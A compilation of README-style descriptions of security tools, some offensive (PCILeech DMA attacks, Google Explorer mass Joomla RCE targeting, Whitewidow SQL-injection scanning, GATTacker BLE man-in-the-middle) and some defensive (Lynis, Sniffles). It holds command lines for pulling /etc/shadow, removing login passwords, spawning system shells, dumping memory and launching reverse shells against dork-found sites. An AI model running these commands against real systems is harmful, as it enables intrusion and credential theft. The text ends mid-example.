
PCILeech - Direct Memory Access (DMA) Attack Software


PCILeech uses the USB3380 chip to read from and write to the memory of a target system. This is achieved by using DMA over PCI Express. No drivers are needed on the target system. The USB3380 can natively read only the first 4GB of memory, but it can read all memory once a kernel module (KMD) is inserted into the target system kernel. Reading 8GB of memory from the target system takes around one (1) minute. The PCILeech hardware is connected over USB3 to a controlling computer running the PCILeech program. PCILeech is also capable of inserting a wide range of kernel modules into the targeted kernels, allowing for pulling and pushing files, removing the logon password requirement, loading unsigned drivers, executing code and spawning system shells. The software is developed in Visual Studio and runs on Windows 7/Windows 10. Supported target systems are currently the x64 versions of Linux, FreeBSD, macOS and Windows.

Hardware:
PCILeech depends on the PLX Technologies USB3380 chip. The chip itself can be purchased for around $15, but it is more convenient to purchase a development board on which the chip is already mounted. Development boards can be purchased from BPlus Technology, or on eBay / AliExpress. Please note that adapters may also be required, depending on your setup.
The hardware confirmed working is:
  • USB3380-EVB mini-PCIe card.
  • PP3380-AB PCIe card.
Please note that the ExpressCard EC3380-AB is not working!
Recommended adapters:
  • PE3B - ExpressCard to mini-PCIe.
  • PE3A - ExpressCard to PCIe.
  • ADP - PCIe to mini-PCIe.
  • Sonnet Echo ExpressCard Pro - Thunderbolt to ExpressCard.
Please note that other adapters may also work.

Flashing Hardware:
In order to turn the USB3380 development board into a PCILeech device it must be flashed. Flashing must be done in Linux as root. Download the source code for the flash kernel module and build it. The files are found in the pcileech_flash folder and are named pcileech_flash.c and Makefile. The card must be connected via PCIe to the Linux system doing the flashing.
NB! If flashing the PP3380 PCIe card the J3 jumper must be bridged to connect the EEPROM. This is not necessary for the USB3380-EVB mini-PCIe card.
  • cd /pathtofiles
  • make
  • [ insert USB3380 hardware into computer ]
  • insmod pcileech_flash.ko
The insmod command must be run as root. If compilation fails you might have to install dependencies before trying again. On Debian-based systems, such as Debian, Ubuntu and Kali, run apt-get update && apt-get install gcc make linux-headers-$(uname -r) and try again.
If module insertion is successful, flashing is also successful. In order to activate the flashed PCILeech device it must be power-cycled; re-inserting it into the computer will achieve this. If you wish to flash more devices, unload the pcileech_flash kernel module by issuing the command: rmmod pcileech_flash . If there is an error, flashing was unsuccessful. Please try again and check for debug error messages by issuing the command: dmesg .
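Putting these steps together, a complete flashing session might look like the sketch below (the dependency install line is Debian-specific, and /pathtofiles stands in for wherever pcileech_flash.c and the Makefile were placed):
    # Install build dependencies (Debian/Ubuntu/Kali)
    sudo apt-get update && sudo apt-get install gcc make linux-headers-$(uname -r)
    # Build the flash kernel module
    cd /pathtofiles
    make
    # With the USB3380 board inserted over PCIe, flash the EEPROM
    sudo insmod pcileech_flash.ko
    # Check for errors, then unload before flashing another board
    dmesg | tail
    sudo rmmod pcileech_flash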

Installing PCILeech:
Please ensure you have the most recent version of PCILeech by visiting the PCILeech GitHub repository at: https://github.com/ufrisk/pcileech
Clone the PCILeech GitHub repository. The binaries are found in pcileech_files and should work on 64-bit versions of Windows 7 and Windows 10. Please copy all files from pcileech_files since some files contain additional modules and signatures.
The Google Android USB driver also needs to be installed. Download it from: http://developer.android.com/sdk/win-usb.html#download and unzip it. Open Device Manager, right-click the computer, choose Add legacy hardware, select Install the hardware manually, click Have Disk, navigate to the Android driver, select android_winusb.inf and install. PCILeech identifies itself as a Google Glass so that the Android USB driver can be used to access the PCILeech hardware from Windows.
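As an alternative to the Device Manager procedure, newer Windows 10 builds can stage and install the driver from an elevated command prompt using the built-in pnputil tool; a minimal sketch, assuming the driver was unzipped to C:\usb_driver (a placeholder path):
    pnputil /add-driver C:\usb_driver\android_winusb.inf /install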

Generating Signatures:
PCILeech comes with built-in signatures for Linux, FreeBSD and macOS. For Windows 8.1 and higher, two full pages of driver code are needed to hijack the kernel. In order to avoid copyright issues, end users have to generate these signatures themselves using the pcileech_gensig.exe program, pointing it at a valid ntfs.sys file. Alternatively, it is possible to use the unstable/experimental win10_x64 generic built-in signature.
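A hypothetical invocation is sketched below; the exact argument syntax may differ, so consult the output of pcileech_gensig.exe itself. The ntfs.sys path shown is the usual location on a running Windows installation:
    pcileech_gensig.exe C:\Windows\System32\drivers\ntfs.sys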

Capabilities:
Users should be able to extend PCILeech easily by writing their own kernel shellcode modules and/or creating custom signatures used to patch target system memory. Some of the current capabilities are listed below:
  • Retrieve memory from the target system at >150MB/s.
  • Write data to the target system memory.
  • 4GB memory can be accessed in native DMA mode.
  • ALL memory can be accessed if kernel module (KMD) is loaded.
  • Execute kernel code on the target system.
  • Spawn system shell [Windows].
  • Spawn any executable [Windows].
  • Load unsigned drivers [Windows].
  • Pull files [Linux, FreeBSD, Windows, macOS].
  • Push files [Linux, Windows, macOS].
  • Patch / Unlock (remove password requirement) [Windows, macOS].

Limitations/Known Issues:
  • Read and write errors on some older hardware. Run pcileech.exe testmemreadwrite -min 0x1000 to test memory reads and writes against physical address 0x1000 (or any other address) to confirm.
  • Does not work if the OS uses an IOMMU (VT-d). This is the default on macOS (unless disabled in recovery mode). Windows 10 Enterprise with virtualization-based security features enabled does not work fully; this is, however, not the default setting in Windows 10.
  • Some Linux kernels do not work. Sometimes a required symbol is not exported in the kernel and PCILeech fails.
  • Linux might also not work if certain virtualization-based features are enabled.
  • Linux based on the 4.8 kernel does not work (Ubuntu 16.10).
  • Windows Vista: some shellcode modules, such as wx64_pscmd, do not work.
  • Windows 7: signatures are not published.

Examples:
Load macOS kernel module:
    pcileech.exe kmdload -kmd macos
Remove the macOS password requirement. Requires that the KMD is loaded at an address; in this example 0x11abc000 is used.
    pcileech.exe macos_unlock -kmd 0x11abc000 -0 1
Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
    pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow
Show help for the lx64_filepull kernel implant.
    pcileech.exe lx64_filepull -help
Load a kernel module into Windows Vista by using the default memory scan technique.
    pcileech.exe kmdload -kmd winvistax64
Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
    pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt
Load a kernel module into Windows 10 (unstable/experimental). Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
    pcileech.exe kmdload -kmd WIN10_X64
Spawn a system shell on the target system (the system needs to be locked and a kernel module must be loaded). In this example the kernel module is loaded at address 0x7fffe000.
    pcileech.exe wx64_pscmd -kmd 0x7fffe000
Show help for the dump command.
    pcileech.exe dump -help
Dump all memory from the target system, given that a kernel module is loaded at address 0x7fffe000.
    pcileech.exe dump -kmd 0x7fffe000
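Combining the examples above, an end-to-end session against a Windows 10 target could look like this; the KMD address 0x7fffe000 is simply the value kmdload reports on success in this example:
    pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt
    pcileech.exe dump -kmd 0x7fffe000
    pcileech.exe wx64_pscmd -kmd 0x7fffe000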

Building:
The binaries are found in the pcileech_files folder. If you wish to build your own version it is possible to do so. Compile the pcileech and pcileech_gensig projects from within Visual Studio. Tested with Visual Studio 2015. To compile kernel- and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled from the command line.

Changelog:
v1.0
• Initial release.
v1.1
• core: help for actions and kernel implants.
• core: search for signatures (do not patch).
• core: signature support for wildcard and relative offsets in addition to fixed offsets.
• implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
• signature: generic Windows 10 (unstable/experimental) [win10_x64].
• signature: Windows 10 updated.
• signature: Linux unlock added.
• other: firmware flash support without PLX SDK.
• other: various bug fixes.
v1.2
• core: FreeBSD support.
• implant: pull file from FreeBSD [fbsdx64_filepull].
• signature: Windows 10 updated.
• signature: macOS Sierra added.
• other: various bug fixes and stability improvements.
latest
• new implant: spawn cmd in user context [wx64_pscmd_user].
• implant: stability improvements for Win8+ [wx64_pscreate, wx64_pscmd, wx64_pscmd_user].



datasploit - A tool to perform various OSINT techniques

A tool to perform various OSINT techniques, aggregate all the raw data, visualise it on a dashboard, and facilitate alerting and monitoring on the data.

Overview of the tool:
• Performs OSINT on a domain / email / username / phone number and finds information from different sources.
• Correlates the results and shows them in a consolidated manner.
• Tries to find credentials, API keys, tokens, subdomains, domain history, legacy portals, etc. related to the target.
• Use a specific script / launch automated OSINT for consolidated data.
• Available in both GUI and console versions.

Basic Usage:

 ____/ /____ _ / /_ ____ _ _____ ____ / /____ (_)/ /_
/ __ // __ `// __// __ `// ___// __ \ / // __ \ / // __/
/ /_/ // /_/ // /_ / /_/ /(__ )/ /_/ // // /_/ // // /_
\__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                              /_/

Open Source Assistant for #OSINT
website: www.datasploit.info

Usage: domainOsint.py [options]

Options:
  -h, --help                  show this help message and exit
  -d DOMAIN, --domain=DOMAIN  Domain name against which automated OSINT is to be performed.
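For example, to run the automated domain OSINT collection against a target domain (example.com is a placeholder):
    python domainOsint.py -d example.com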

Required Setup:
• A bunch of Python libraries (use requirements.txt).
• MongoDB, Django, Celery and RabbitMQ (refer to the setup guide).

Detailed Tool Documentation:
http://datasploit.readthedocs.io/en/latest/


BinProxy - BinProxy is a proxy for arbitrary TCP connections


BinProxy is a proxy for arbitrary TCP connections. You can define custom message formats using the BinData gem.

Installation

Prerequisites
• Ruby 2.3 or later
• A C compiler, Ruby headers, etc., are needed to compile several dependencies.
  • On Ubuntu, sudo apt install build-essential ruby-dev should do it.
  • If you've installed a custom Ruby (e.g. with RVM), you probably already have what you need.
• openssl binary for --tls without an explicit cert/key.
• To build the UI, node.js and npm. (Not needed at runtime.)

From Rubygems
gem install binproxy
You may need to use sudo, depending on your Ruby installation.

From Source
git clone https://github.com/nccgroup/BinProxy.git binproxy
cd binproxy

# Install ruby dependencies.
# Depending on your setup, one or both of these may require sudo.
gem install bundler && bundle

# The UI is built with a webpack/babel toolchain:
(cd ui && npm install) \
  && rake build-ui

# Confirm that everything works
# run.sh sets up the environment and passes all args to binproxy
./run.sh --help

To build and install the gem package:
gem build binproxy.gemspec

# Again, you may need sudo here
gem install binproxy-1.0.0.gem

Bug reports on installation issues are welcome!

Usage

Basic Usage
1. Run binproxy with no arguments.
2. Browse to http://localhost:4567/
3. Enter local and remote hostnames or IP addresses and ports, and click 'update'.
4. Point a client at the local service, and watch the packets flow.

Command Line Flags
See --help for the complete list, but in short:
binproxy -c <class> [<local-host>] <local-port> <remote-host> <remote-port>
If you leave out the -c argument, a simple hex dump is shown.
If you leave out the local host, binproxy assumes localhost.
With the --socks-proxy or --http-proxy options, the remote host and port are determined dynamically, and should not be specified.

Examples
# Proxy from localhost:9000 -> example.com:9000
binproxy localhost 9000 example.com 9000

# Act as a SOCKS proxy on localhost:1080
# MITM and unwrap TLS on the proxied traffic, using a self-signed cert and key
binproxy -S --tls 1080

# "Poor substitute for Burp" mode:
#
# HTTP proxy; MITM TLS w/ pre-generated cert; simple header parsing
# Note: this will only work on HTTPS traffic, not plain HTTP!
# If you're working with the source repo, you generate the certs with:
#   rake makecert[example.com]
# And then import certs/ca-cert.pem into your browser or OS's trust store.
binproxy -H --tls \
  --tls-cert certs/example.com-cert.pem \
  --tls-key certs/example.com-key.pem \
  --class-name DumbHttp::Message \
  localhost 8080

Customizing
By default, the proxy uses the built-in RawMessage class, which just gives you a hexdump of each message (assuming a 1:1 correspondence between messages and TCP packets).
You can view parsed protocol information by specifying a BinData::Record subclass† with the --class command line argument.
You may also wish to define the following in your class:
def summary
  # return a single-line description of this record
end

# currently supported options are
# - nil       : use default display
# - "anon"    : for structs, show contents directly
# - "hex"     : for numbers, display as 0x1234ABCD
# - "hexdump" : for strings, display like `hexdump -C`
default_parameter display_as: "..."

# TODO: document state stuff
def self.initial_state
end

def current_state
end

def update_state
end

† Technically, any subclass of BinData::Base will work.

Dynamic Proxying
By default, BinProxy relays all traffic to a static upstream host and port. It can also be configured to act as a SOCKS (v4 or v4a) or HTTP proxy with the --socks-proxy and --http-proxy flags, respectively.
Note: Currently, the HTTP proxy only supports connections tunneled with the HTTP CONNECT verb; it cannot proxy raw HTTP GET, POST, etc., requests. In practice, this means that HTTPS traffic will work, but plain HTTP traffic will not unless the client supports a flag to force tunneling, like curl -p.
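For example, to exercise the HTTP proxy mode with a client that forces tunneling: curl's -p (--proxytunnel) flag sends a CONNECT request even for plain HTTP, and the localhost:8080 listener address matches the example above:
    curl -p -x http://localhost:8080 http://example.com/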

TLS / SSL
Use the --tls flag to unwrap TLS encryption before processing messages. By default, BinProxy will generate a self-signed certificate. You can specify PEM files containing a certificate and key with --tls-cert and --tls-key. (If you've cloned the source repo, use rake makecert[example.com] to generate a static CA and a certificate with the appropriate hostname.)


BORG - Terminal Based Search For Bash Snippets


Borg was built out of the frustration of having to leave the terminal to search and click around for bash snippets. Borg's succinct output also makes it easy to glance over multiple snippets quickly.

Search
borg "find all txt"
(1) Find and delete .txt files in bash
[a] find . -name "*.txt" | xargs rm
[b] find . -name "*.txt" -exec rm {} \;
[c] $ find . -name "*.txt" -type f -delete

(2) bash loop through all find recursively in sub-directories
[a] FILES=$(find public_html -type f -name '*.php')
[b] FILES=`find public_html -type d`
Can't find what you are looking for? Be a good hacker and contribute your wisdom to the hive mind - add your own snippets or tweak the existing ones.

Install
The following releases only let you search; to use add/edit, install from source (releases with those features are coming soon).
brew install borg
For Linux, download a release manually from the releases page:
wget https://github.com/ok-borg/borg/releases/download/v0.0.1/borg_linux_amd64 -O /usr/local/bin/borg
chmod 755 /usr/local/bin/borg
Or download a release manually for Mac:
wget https://github.com/ok-borg/borg/releases/download/v0.0.1/borg_darwin_amd64 -O /usr/local/bin/borg
chmod 755 /usr/local/bin/borg

Rate results: worked
When you see a result that worked for you, you can use the worked command to give feedback:
borg worked 12
Once you do this the result will rank higher for similar queries; this is especially useful when you find a good result that you think sits too far down the result list.

Advanced usage
For more commands and their explanations, please see the advanced usage documentation.

How does borg work?
The client connects to a server at ok-b.org, but you can host your own if you want to (see the daemon folder). Self-hosting will become less appealing once people start contributing their own content to the database, though.

Explanation of the UI
• () denotes hits for your query
• [] denotes snippets found for a given query
• ... under a [] means more lines to display (use the -f flag for full display; see more about usage below)


Google Explorer - Google Mass Explorer


[+] Google Mass Explorer

This is an automated robot for the Google search engine. It performs a Google search and parses the results for a specific exploit you define. The options can be listed with the --help parameter.

Intro:
This is a main project that I will keep upgrading as new exploits are published. The idea is to use the Google search engine to find targets vulnerable to specific exploits. The exploit parsers are concentrated in the google_parsers module, so when you run a search you can choose, via the --exploit_parser argument, which exploit the robot should test the targets against.
** It is very important to use the right dork for the specific exploit.
The google_parsers module (google_parsers.py) is the file that I will keep upgrading. For this version I am including just the Joomla CVE exploit. I have a WordPress bot too, but the idea is that you write your own parsers. If you have difficulty writing one, just send me the exploit and we will write it together.
I wrote this Google explorer because I am very busy and it takes too much time to search for targets on Google manually, so I used an automation framework (Selenium) to build a robot that searches for targets for me. The problem with other libraries and modules is Google's captcha; with Selenium you can type the captcha when it is displayed and the robot keeps crawling with no problem. This was the only way I found to "bypass" this kind of protection. Once it worked, I decided to publish it for everyone.

How the robot works:
1 - Performs a Google search
2 - Parses the results from each page
3 - Tests whether each target is vulnerable to a specific exploit

Requirements:
!!!!!! PYTHON 3 !!!!!!
The requirements are in the requirements.txt file; install what is listed in it with:
$ sudo pip install -r requirements.txt
These are some examples that you can use and adapt:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
In this example, I am looking for servers in France that are vulnerable to the Joomla RCE, using the google.com domain for the search (domains are listed in the google_doomais.txt file), with a last update within the last month ("França" and "no último mês" are the Portuguese strings for "France" and "in the last month").
All these options work in any language; it only depends on the syntax Google uses for your country.
I have some old videos on my YouTube channel showing how it works, so take a look at the descriptions of the older projects on GitHub if you need video examples.

Usage:
google_explorer.py --dork=<arg> --browser=<arg> [--exploit_parser=<arg>] [--language=<arg>]
                   [--location=<arg>] [--last_update=<arg>]
                   [--revshell=<arg>] [--port=<arg>]
                   [--google_domain=<arg>]

google_explorer.py --help
google_explorer.py --version

Options:
  -h --help      Open help menu
  -v --version   Show version

Required options:
  --dork='google dork'                    your favorite g00gle dork :)
  --browser='browser'                     chrome, chromium

Optional options:
  --language='page language'              Portuguese, English, Arabic, Romanian, ...
  --location='server location'            Brazil, Mauritania, Tunisia, Morocco, Japan, ...
  --last_update='page last update'        anytime, past 24 hours, past week, past month, past year
  --exploit_parser='Name or CVE exploit'  joomla_15_12_2015_rce, generic_parser
  --revshell='IP'                         public IP for reverse shell
  --port='PORT'                           port for back connect
  --google_domain='google domain'         google domain to use for the search. Ex: google.co.uk


Lynis 2.4.0 - Security Auditing Tool for Unix/Linux Systems


We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis; these are the next round of simplification improvements. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool, used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is lightweight and easy to use. Installation is optional: just copy it to a system and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).
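Since installation is optional, a quick way to try it is to fetch the source and run it in place; a minimal sketch, assuming you pull the code from the project's GitHub repository (CISOfy/lynis):
    # Fetch Lynis and run an audit directly from the working copy
    git clone https://github.com/CISOfy/lynis
    cd lynis
    ./lynis audit system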

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization of the program up to the report.

Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan
Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.
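After a scan you typically review those two files; a short sketch, assuming the default locations used by most Lynis installations (/var/log/lynis.log and /var/log/lynis-report.dat, both configurable):
    # Run the audit, then pull warnings and suggestions out of the report file
    sudo ./lynis audit system
    grep -E '^(warning|suggestion)' /var/log/lynis-report.dat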

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. If during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that, collecting any discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis always performs scans that are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards plus many custom ones not found in any other tool.
• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


Changelog
Upgrade note
Lynis 2.4.0 (2016-10-27)

Exactly one month after the previous release, the Lynis project is proud to announce a new release, with a specific focus on improved support for macOS. Thanks to the testers and contributors who made this possible.

New:
----
* New group "system integrity" added
* Support for clamconf utility
* Chinese translation (language=cn)
* New command "upload-only" to upload just the data instead of a full audit
* Enhanced support for macOS, including HostID2 generation for macOS
* Support for CoreOS
* Detection for pkg binary (FreeBSD)
* New command: lynis show hostids (show host ID)
* New command: lynis show environment (hardware, VM, or container type)
* New command: lynis show os (show operating system details)

Changes:
--------
* Several new sysctl values have been added to the default profile
* Existing tests have been enhanced to support macOS

Tests:
------
* AUTH-9234 - Support for macOS user gathering
* BOOT-5139 - Support for machine roles in LILO test
* BOOT-5202 - Improve uptime detection for macOS and others
* FIRE-4518 - Improve pf detection and mark as root-only test
* FIRE-4530 - Don't show error on screen for missing IPFW sysctl key
* FIRE-4534 - Check Little Snitch on macOS
* INSE-8050 - Test for insecure services on macOS
* MACF-6208 - Allow non-privileged execution and filter permission issues
* MALW-3280 - Detection for Avast and Bitdefender daemon on macOS
* NETW-3004 - Support for macOS
* PKGS-7381 - Improve test for pkg audit on FreeBSD
* TIME-3104 - Chrony support extended

Plugins (community and commercial):
-----------------------------------
* PLGN-1430 - Gather installed software packages for macOS
* PLGN-4602 - Support for Clam definition check on macOS


GATTacker - BLE (Bluetooth Low Energy) Man-in-the-Middle



A Node.js package for BLE (Bluetooth Low Energy) security assessment using Man-in-the-Middle and other attacks.

Prerequisites
See:
https://github.com/sandeepmistry/noble
https://github.com/sandeepmistry/bleno

Install
npm install gattacker

Usage

Configure
To run both components, set up the variables in config.env:
• NOBLE_HCI_DEVICE_ID : noble ("central", ws-slave) device
• BLENO_HCI_DEVICE_ID : bleno ("peripheral", advertise) device
• WS_SLAVE : IP address of the ws-slave box
• DEVICES_PATH : path to store JSON files
If you run the "central" and "peripheral" modules on separate boxes with just one BT4 interface each, you can leave the device ID values commented out. An example config.env follows this list.
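A hypothetical config.env illustrating these variables (the interface numbers and IP address are placeholders for your own setup):
    NOBLE_HCI_DEVICE_ID=0      # hci0 acts as the "central" (ws-slave) side
    BLENO_HCI_DEVICE_ID=1      # hci1 acts as the "peripheral" (advertise) side
    WS_SLAVE=192.168.1.10      # address of the box running ws-slave
    DEVICES_PATH=./devices     # where .adv.json / .srv.json files are stored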

                      Start "central" device
                      sudo node ws-slave
                      Connects to targeted peripheral and acts as websocket server.
                      Debug:
                      DEBUG=ws-slave sudo node ws-slave

                      Scanning

                      Scan for advertisements
                      node scan
                      Without parameters scans for broadcasted advertisements, and records them as json files (.adv.json) in DEVICES_PATH

                      Explore services and characteristics
                      node scan <peripheral>
                      Explore services and characteristics of chosen peripheral. Saves the explored service structure in json file (.srv.json) in DEVICES_PATH.

Hook configuration (optional)
For active request/response tampering, configure hook functions for a characteristic in the device's JSON services file.
Example:
{
    "uuid": "06d1e5e779ad4a718faa373789f7d93c",
    "name": null,
    "properties": [
        "write",
        "notify"
    ],
    "startHandle": 8,
    "valueHandle": 9,
    "endHandle": 10,
    "descriptors": [
        {
            "handle": 10,
            "uuid": "2902",
            "value": ""
        }
    ],
    "hooks": {
        "dynamicWrite": "dynamicWriteFunction",
        "dynamicNotify": "customLog"
    }
}
Functions:
• dynamic: connect to the original device
• static: do not connect to the original device; run the tampering function locally (e.g. staticValue, which returns a static value)
GATTacker will try to invoke the specified function from hookFunctions; you can include your own. A few examples are provided in the hookFunctions subdirectory.

                      Start "peripheral" device
                      node advertise -a <advertisement_json_file> [ -s <services_json_file> ]
                      It connects via websocket to ws-slave in order to forward requests to original device. Static run (-s) sets services locally, does not connect to ws-slave. You have to configure the hooks properly.
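Putting the pieces together, a typical MITM session built from the commands above might look like this; AA:BB:CC:DD:EE:FF stands in for the target's MAC address, and the JSON file names are placeholders for the files the scanner writes to DEVICES_PATH:
    # On the "central" box: discover the target, then start the websocket slave
    node scan
    node scan AA:BB:CC:DD:EE:FF
    sudo node ws-slave
    # On the "peripheral" box: advertise a clone of the target
    node advertise -a devices/target.adv.json -s devices/target.srv.json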

MAC address cloning
For many applications it is necessary to clone the MAC address of the original device. A helper tool, bdaddr from BlueZ, is provided in helpers/bdaddr:
cd helpers/bdaddr
make
Wrapper script:
./mac_adv -a <advertisement_json_file> [ -s <services_json_file> ]

Troubleshooting
Turn it off, cross your fingers, try again ;)

Reset device
hciconfig <hci_interface> reset

Running ws-slave and advertise on the same box
With this configuration you may experience various problems.
Try switching NOBLE_HCI_INTERFACE and BLENO_HCI_INTERFACE.

hcidump debug
hcidump -x -t <hci_interface>

FAQ, more information
FAQ: https://github.com/securing/gattacker/wiki/FAQ
More information: www.gattack.io


Whitewidow 1.5.0 - SQL Vulnerability Scanner


Whitewidow is an open source automated SQL vulnerability scanner that can run through a file list or scrape Google for potentially vulnerable websites. It features automatic file formatting, random user agents, IP address and server information output, multiple SQL injection syntaxes, and a fun environment. This program was created for learning purposes, and is intended to teach users what vulnerabilities look like.
Although whitewidow is a completely open source and completely free project, every once in a while I need a beer. If you like this program and this idea, you can help me with my beer fund.

Usage
ruby whitewidow.rb -h
Will print the help page.
ruby whitewidow.rb -c
Will display the credits; can also be run in conjunction with -f or -d.
ruby whitewidow.rb -l
Will display the legal info; can also be run in conjunction with -f or -d.
ruby whitewidow.rb -d
Will run whitewidow in default mode and scrape Google using the search queries in the lib directory.
ruby whitewidow.rb -d --banner
Will scrape Google and hide the banner.
ruby whitewidow.rb -d --proxy 127.0.0.1:80
Proxy configuration; must use the ":".
ruby whitewidow.rb -d --dry-run
Will do a dry run of the program, meaning it won't scan for vulnerabilities; will prompt whether you want to run a scan or not.
ruby whitewidow.rb -d --dry-run --batch
Will do a dry run, not prompt you for anything, and won't run a scan.
ruby whitewidow.rb -f <path/to/file>
Will run Whitewidow through a file. You do not need to provide the full path to the file; just provide the path within the whitewidow directory itself, without a leading slash.

Example:
- whitewidow.rb -f tmp/sites.txt #<= CORRECT
- whitewidow.rb -f /home/users/me/whitewidow-1.0.6/tmp/sites.txt #<= INCORRECT
ruby whitewidow.rb --run-x 10
Will run 10 dry runs in batch mode and display no other information (legal, banner, etc.).
ruby whitewidow.rb -s URL
Will spider the URL and extract all the links from there, saving them to a file, then run that file through whitewidow's file flag.

Dependencies
gem 'mechanize'
gem 'nokogiri'
gem 'rest-client'

To install all gem dependencies:
cd whitewidow
bundle install

This should install all needed gems and let you run the program without trouble.



Sniffles - Packet Capture Generator for IDS and Regular Expression Evaluation


Sniffles is a tool for creating packet captures that will test IDS that use fixed patterns or regular expressions for detecting suspicious behavior. Sniffles works very simply: it takes a set of regular expressions or rules, randomly chooses one, and generates content based on it. For fixed strings, this means adding the string directly to the data (possibly with offsets or other options as per Snort rules). For regular expressions the process is somewhat more complex: the regular expression is converted to an NFA, a random path is chosen through the NFA (from start to end), and the resulting data will match the regular expression. Sniffles can be set to full match or partial match. With a full match, the packet data will absolutely match at least one rule or regular expression (some Snort options are not fully considered, though). A partial match erases the last character of a matching character sequence, turning it into a sequence that should not match (it may still match another rule). Matching rules should place the greatest burden on an IDS, making it possible to determine how well the IDS handles worst-case traffic; partially matching traffic causes almost as much burden as matching traffic. Finally, Sniffles can also generate traffic with completely random data. Such random data offers a best-case scenario, as it is very unlikely to match any rules and can therefore be processed at maximum speed. Thus, Sniffles allows the creation of packet captures for both best- and worst-case operation of IDS deep packet inspection.
In addition to the above, Sniffles can create evaluation packet captures, of which there are two types. The first creates exactly one packet for each rule or regular expression, in sequence, making it possible to verify that each rule matches as expected. The full evaluation goes a step further and creates a packet for every possible branch of a regular expression; a single regular expression could have thousands of possible branches. This tests that all possible branches are handled properly. Evaluation packet captures should match all packets; any unmatched packets most likely represent a failure of the IDS and need further investigation. Of course, there is always the possibility that Sniffles is not creating the correct packet for a given IDS, or does not recognize a particular rule option. Check the supported rule features for more information.
Finally, Sniffles can do a lot for generating random network traffic. By default, random traffic is TCP, UDP, or ICMP and unidirectional. However, it can also generate TCP traffic with ACKs, handshakes, and teardowns for each stream, with correct sequence numbers and checksums. Further, MAC addresses can be set according to desired distributions, and IP network addresses can be defined by Home and External address spaces. It is also possible to simulate scans within a traffic capture.

Install
REQUIRES: Python 3.3+ and the SortedContainers module
Sniffles consists of the following files:
• rulereader.py: The parser for rules.
• ruletrafficgenerator.py: The tool for generating content streams.
• sniffles.py: The main program managing the process.
• sniffles_config.py: Handles command line input and options for Sniffles.
• traffic_writer.py: Writes a packet into a pcap-compatible file. Does not require libpcap.
• vendor_mac_list.py: Contains MAC Organisationally Unique Identifiers, used for generating semi-realistic MAC addresses rather than just randomly mashed-together octets.
• examples/vendor_mac_definition.txt: Optional file for defining the distribution of partial or full MAC addresses.
• PCRE files (pcre_chartables.c pcre_compile.c pcre_globals.c pcre_internal.h pcre_newline.c pcre_tables.c pcre.h pcrecomp.c pcreconf.py ucp.h).
• nfa.py: For traversing NFAs.
• regex_generator.py: The code for generating random regular expressions.
• rand_rule_gen.py, feature.py, and rule_formats.py: Modules for generating random rule sets.
To install:
1. Go to the top-level directory.
2. Type python3.x setup.py install .
3. This will install the application to your system.
Install Notes:
1. This has not been tested on Windows or Linux. It has been tested on FreeBSD and Mac OS X.
2. Use python3.x setup.py build to build locally, then go to the library directory, find the lib and use python3.4 -c "from sniffles import sniffles; sniffles.main()" to run locally.

Supported Formats:
• Snort: Snort alert rules (the rule should begin with the alert directive). Content tags are recognized and parsed correctly, as are PCRE tags. HTTP tags are processed consecutively, so they may not create the desired packet. Content (and PCRE or HTTP content) can be modified by distance, within and offset. A rule may use a flow control option, though only the direction of the data is derived from this. The nocase option is ignored and the case presented is used. All other options are ignored. The header values are parsed and a packet will be generated meeting those values. If Home and External network address spaces are used, the correct space will be used for the respective $HOME_NET and $EXTERNAL_NET variables. Example:
  alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SERVER-APACHE Apache Tomcat UNIX platform directory traversal"; flow:to_server; content:"/..|5C|/"; content:"/..|5C|/"; http_raw_uri;
• Regular expressions: Raw regular expressions, one per line, written as either abc or /abc/i. Currently supports the options i, s, and m. Other options are ignored. Example:
  /ab*c(d|e)f/i
• The Sniffles rule format described below.
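As a quick smoke test of the regular-expression input format, you can drop a couple of patterns into a file and build a small capture from it; a minimal sketch (myre.re is an arbitrary file name, and the second pattern is an illustrative placeholder; the -c/-f/-m flags are described below):
  # Two raw regular expressions, one per line
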